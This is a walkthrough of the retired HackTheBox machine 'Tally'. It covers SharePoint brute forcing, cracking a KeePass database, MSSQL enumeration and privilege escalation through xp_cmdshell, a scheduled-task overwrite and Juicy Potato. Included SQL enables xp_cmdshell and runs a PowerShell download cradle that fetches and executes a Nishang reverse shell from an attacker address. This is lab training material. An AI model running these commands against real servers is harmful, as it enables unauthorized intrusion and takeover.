HacktheBox - Tally - Retired
Recon
Let's use threader3000 for our recon scan. It's a threaded scanner written in Python that does a quick up/down check of all 65535 TCP ports, then suggests an nmap scan based on the results. It saves the nmap results as XML automatically, and we can convert that to HTML afterwards.
There are a lot of open ports on this box:
21,80,81,445,808,1433,5985,15567,32843,32844,32846,47001,49664,49665,49666,49667,49668,49669,49670
Looks like a Windows box with FTP (21), SMB (445), MSSQL (1433), HTTP (80 and 81), WinRM (5985) and a bunch of high RPC ports.
Let's start by checking SMB to see if we can get any info out of it.
Nope, nothing is open to anonymous users.
What about FTP?
Same story: nothing for anonymous users.
According to the nmap output, port 80 is a SharePoint site, so let's check that out next.
It does look like a SharePoint site.
The only thing available to us is a login prompt. Let's try admin/admin.
That didn't let us in, but we captured this in Burp:
There is a base64-encoded value in the Authorization header, but nothing we can use yet.
Let's see if anything else on this port is available to us, and brute-force directories and files we might have access to.
The folks at Bishop Fox have published a brute-force tool built specifically for SharePoint, so let's download the Perl script and its extensions file:
https://resources.bishopfox.com/resources/tools/sharepoint-hacking-diggity/attack-tools/
perl SharePointURLBrute\ v1.1.pl -a "http://tally.htb" -e SharePoint-UrlExtensions-18Mar2012.txt
The last result here is interesting:
FOUND: http://tally.htb/shared documents/forms/allitems.aspx
We can open it in an online viewer to read the contents of ftp-details.docx:
UTDRSCH53c"$6hys
So we have a password but no username.
Luckily another page gives us some more info:
http://tally.htb/SitePages/FinanceTeam.aspx
Alright, we've got a username now: ftp_users.
Let's use FileZilla to download everything on the FTP server in case there is more data hiding in it.
There are some to-do notes in the IT users' folders for Sarah and Tim:
Sarah
Tim
A password in KeePass? That sounds promising.
In Tim's folder there is a tim.kdbx file, which should be his KeePass database.
Let's transfer it over to a Windows box, since KeePass is primarily a Windows program.
If we try to open the kdbx we get this:
We need a password.
Let's see if we can crack it with John the Ripper.
Here is a blog post that describes the steps:
https://tzusec.com/tag/keepass2john/
First we need to convert the database into a hash format john understands, using the keepass2john utility that ships with it:
/usr/sbin/keepass2john ./tim.kdbx
That gives us output we can save to a file called keepasshash and feed to john.
It should only take a minute or two to recover the master password.
There were a couple of passwords in the database, but one jumps out:
Tally Acct Share
Let's bounce back to SMB now that we have creds that should work there.
There is an ACCT share plus the usual admin shares. Let's try the admin shares first, just in case.
Nope.
Okay, what about the ACCT share?
Some folders here to check out.
Under zz_Archived/SQL we find this file, conn-info.txt:
Looks like what used to be the SA password for SQL, but the note says it has since been changed.
Another interesting finding that probably won't help us own this box: they keep a spreadsheet of all their customers along with their credit card numbers. I don't think these guys are PCI compliant.
Let's keep poking around.
In ACCT/zz_Migration/Binaries/New folder/ there are a bunch of executables, one with the interesting name tester.exe.
Let's grab a copy and see what it is.
Let's run strings against it to see if it leaks what it is or what it does.
Looks like we have another possible SA password.
Let's connect with a tool called mssql-cli:
https://github.com/dbcli/mssql-cli
First let's see what databases are on the server:
select name FROM master.dbo.sysdatabases;
Ok, we have master, tempdb, model and msdb, the four system databases and nothing custom.
Let's look at the tables in these databases.
There are some tables in master, nothing in tempdb or model, and a whole lot in msdb (expected, since it is the workhorse database behind SQL Server Agent, backups and the like).
The next command comes from HackTricks, which is a good resource for looking at MSSQL:
https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
It even gives a pro tip: the account running MSSQL most likely holds SeImpersonatePrivilege, which makes the box a probable candidate for a Juicy Potato attack.
The query returns a hash for the sa account, but we already know that password. sarah also has a login to SQL here, but no hash is stored for it, which is what a Windows-authenticated login looks like.
Poking around in the databases doesn't turn up anything else interesting.
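The enumeration queries run from the sa session, collected into one pass as an added example (this is not code from the original writeup, and the only identifiers taken from the box are sa and sarah; everything else is whatever the instance returns). The last query is an extra that the post does not cover: it lists logins that could impersonate another login even without knowing its password, which matters on instances where you land with something weaker than sa.

```sql
-- Added example, not code from the original writeup: the enumeration pass against
-- the Tally MSSQL instance, run as sa with the password recovered from tester.exe.

-- Confirm who we are and whether we hold sysadmin (1 = yes). Enabling
-- xp_cmdshell later depends on this.
SELECT SYSTEM_USER AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- Databases. sys.databases is the current view behind master.dbo.sysdatabases.
-- master, tempdb, model and msdb are the four system databases; anything else
-- is application data worth a look.
SELECT name, database_id, state_desc, recovery_model_desc
FROM   master.sys.databases
ORDER  BY database_id;

-- Tables in every database in one pass. sp_MSforeachdb substitutes each
-- database name for the '?' placeholders.
EXEC sp_MSforeachdb
  'SELECT ''?'' AS db, s.name AS [schema], t.name AS [table]
   FROM [?].sys.tables  AS t
   JOIN [?].sys.schemas AS s ON s.schema_id = t.schema_id';

-- Logins. Only SQL-authenticated logins carry a password hash; a Windows login
-- such as sarah appears in server_principals as type U (WINDOWS_LOGIN) but has
-- no row in sql_logins, which is why no hash comes back for her.
SELECT name, type_desc, is_disabled, create_date
FROM   master.sys.server_principals
WHERE  type IN ('S', 'U', 'G')      -- SQL login, Windows login, Windows group
AND    name NOT LIKE '##%';         -- skip the internal certificate-based logins

SELECT name, password_hash          -- the value john/hashcat would crack
FROM   master.sys.sql_logins;

-- Who may impersonate whom at the server level. A grantee that can impersonate
-- sa is as good as sa: EXECUTE AS LOGIN = 'sa' needs no password.
SELECT gp.name AS grantee,
       pr.name AS can_impersonate,
       pe.state_desc
FROM   master.sys.server_permissions AS pe
JOIN   master.sys.server_principals  AS gp ON gp.principal_id = pe.grantee_principal_id
JOIN   master.sys.server_principals  AS pr ON pr.principal_id = pe.major_id
WHERE  pe.class = 101                -- 101 = server principal
AND    pe.permission_name = 'IMPERSONATE';
```

Run the statements one at a time in mssql-cli if the client balks at multiple result sets in one batch; each is independent of the others.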
Exploit
However, since we are sa on this instance, we should be able to use it to run commands on the box.
Looks like xp_cmdshell is not enabled. Guess what: we are sa and can do whatever we want, so let's enable it. :)
Much better
Let's get a real shell
We'll use Nishang's Invoke-PowerShellTcp.ps1
First download the file, or clone the repo if you don't already have it:
https://github.com/samratashok/nishang
Copy Invoke-PowerShellTcp.ps1 to the folder you want to serve it from.
Add this line to the bottom of the script so it runs as soon as it is downloaded (with your VPN IP and port of choice):
Next we set up a listener on our Kali box.
Then, in our sa connection to Tally, we run:
Note: there is a process on the box that keeps re-disabling xp_cmdshell, so you may need to redo that step if you are too slow.
With any luck we get a PowerShell reverse shell back.
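The xp_cmdshell part of the procedure in one place, as an added example rather than code from the original post. It checks the current configuration, enables the procedure, confirms the account the shell will run as, and fires the download cradle. The attacker address 10.10.14.5, the HTTP port 8000 and the listener port 4444 are placeholders for your own VPN IP and ports, and the Invoke-PowerShellTcp line quoted in the comment is the one assumed to have been appended to the bottom of the Nishang script.

```sql
-- Added example, not code from the original writeup: command execution through
-- xp_cmdshell from the sa session. 10.10.14.5, port 8000 (HTTP server hosting
-- the script) and port 4444 (nc listener) are placeholders for your own values.

-- 1. Current state. value_in_use = 0 means disabled; 'show advanced options'
--    has to be on before sp_configure will accept the xp_cmdshell option.
SELECT name, value, value_in_use
FROM   sys.configurations
WHERE  name IN ('show advanced options', 'xp_cmdshell');

-- 2. Enable it. RECONFIGURE applies the change immediately, no restart needed.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 3. Confirm the context commands run in: the SQL Server service account.
--    SeImpersonatePrivilege in this output is what makes Juicy Potato an
--    option for privilege escalation later.
EXEC master..xp_cmdshell 'whoami /priv';

-- 4. Download cradle: fetch Invoke-PowerShellTcp.ps1 (with
--      Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.5 -Port 4444
--    appended to the end) and execute it in memory. Single quotes inside a
--    T-SQL string literal are doubled. The call blocks for as long as the
--    reverse shell is alive, so it is normal for this query never to "finish".
EXEC master..xp_cmdshell
  'powershell.exe -NoProfile -ExecutionPolicy Bypass -Command "IEX (New-Object Net.WebClient).DownloadString(''http://10.10.14.5:8000/Invoke-PowerShellTcp.ps1'')"';

-- Something on the box periodically turns xp_cmdshell back off. Submitting
-- steps 2 and 4 together as a single batch closes that window; if you see
-- "SQL Server blocked access to procedure 'sys.xp_cmdshell'", rerun step 2.
```

Start the HTTP server and the listener before submitting step 4; the cradle has to find both up when xp_cmdshell executes it.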
And we can grab user.txt now.
Now we just need to escalate. Remember the earlier tip about the service account probably having SeImpersonatePrivilege?
Let's check.
Yup
Ok, so a Potato privilege escalation should work here.
But let's poke around and see if there is another path first.
Look at these two files: SPBestWarmUp.ps1 and SPBestWarmUp.xml.
The XML sure looks like an exported scheduled task definition, and even better, one that runs as Administrator.
And all it does is run the PowerShell script on Sarah's Desktop.
So if we overwrite that file, the task will run whatever we want as Administrator.
Let's try it.
We had good luck with our first PowerShell reverse shell, so let's just modify it to use a different port and overwrite the file with it. Rename the copy (I just added -Admin to the end) and change the invoke line at the bottom to a port that isn't already in use.
Let's start a new listener on that port.
Then overwrite the .ps1 on her desktop with the new one.
From our shell on Tally, echo does the job.
Now we just need to wait for the task to fire.
Here comes the bad news with this method:
That trigger means it only runs once an hour, which really hurt in my case because I missed a quotation mark the first time and had to wait almost two full hours.
In theory this works as long as the Administrator account is running the scheduled task, but I'm done waiting for it. Let's potato this bad boy.
Let's use the same path we used on Bounty.
Grab a copy of Juicy Potato:
https://github.com/ohpe/juicy-potato/releases
Use certutil to download it to Tally.
Create a .bat file for a reverse shell; I used a PowerShell reverse shell here.
I created it on Kali and used certutil and updog to get it onto Tally.
Then I just ran Juicy Potato with the defaults, pointing it at rshell.bat.
And there we go, we've got our root flag.